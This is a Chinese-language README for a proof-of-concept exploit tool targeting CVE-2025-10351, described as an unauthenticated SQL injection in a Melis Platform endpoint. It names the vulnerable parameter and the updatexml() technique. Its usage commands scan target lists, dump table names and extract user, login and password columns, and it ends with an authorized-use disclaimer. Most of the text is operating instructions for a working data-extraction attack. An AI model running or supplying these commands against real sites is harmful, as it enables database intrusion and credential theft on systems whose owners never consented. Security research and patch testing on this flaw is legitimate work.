针对 CVE-2025-10351 的 POC:一个影响 Melis Platform Framework 中特定端点的未认证 SQL 注入漏洞。
此 POC 针对以下端点中的未认证基于错误的 SQL 注入漏洞:
melis/MelisCms/PageEdition/getTinyTemplates?idPage=
它利用 MySQL 中的 updatexml() 来提取:
它还会检测可能的基于时间的 SQLi 向量,以便进一步手动利用。
使用以下命令安装依赖:
pip3 install -r requirements.txt
python3 CVE-2025-10351-POC.py -u http://target.com -p 80
python3 CVE-2025-10351-POC.py -l targets.txt
python3 CVE-2025-10351-POC.py -u http://target.com -p 80 -at
python3 CVE-2025-10351-POC.py -u http://target.com -p 80 -t users
python3 CVE-2025-10351-POC.py -u http://target.com -p 80 -t users -ac
python3 CVE-2025-10351-POC.py -u http://target.com -p 80 -t users -c user,login,password
python3 CVE-2025-10351-POC.py -u http://target.com -p 80 -t users -c user,login,password --proxy http://127.0.0.1:8080 --insecure --cookies 2prkpe1h72nd4fhmlum65okc04 --debug
| 参数 | 描述 |
|---|---|
-u | 目标 URL |
-p | 端口(80、443 等) |
-l | 包含 URL 列表的文件 |
-s | 基于时间测试的休眠时间(默认:1 秒) |
-at | 导出所有表名 |
-t | 指定表名 |
-ac | 导出指定表的所有列 |
-c | 要导出的列列表,以逗号分隔 |
--proxy | Burp 代理 http://127.0.0.1:8080 |
--insecure | 使用代理连接时禁用 TLS 检查 |
--cookie | 用于认证请求的 Cookie |
--debug | 调试模式 |
tables_extracted.txt<table_name>_data.txt本文档仅用于授权安全测试和修复。请不要对你不拥有或未经明确许可测试的系统使用此 PoC 或复现步骤。作者对滥用行为不承担任何责任。
由 Manuel Iván San Martín Castillo 用 ❤️ 制作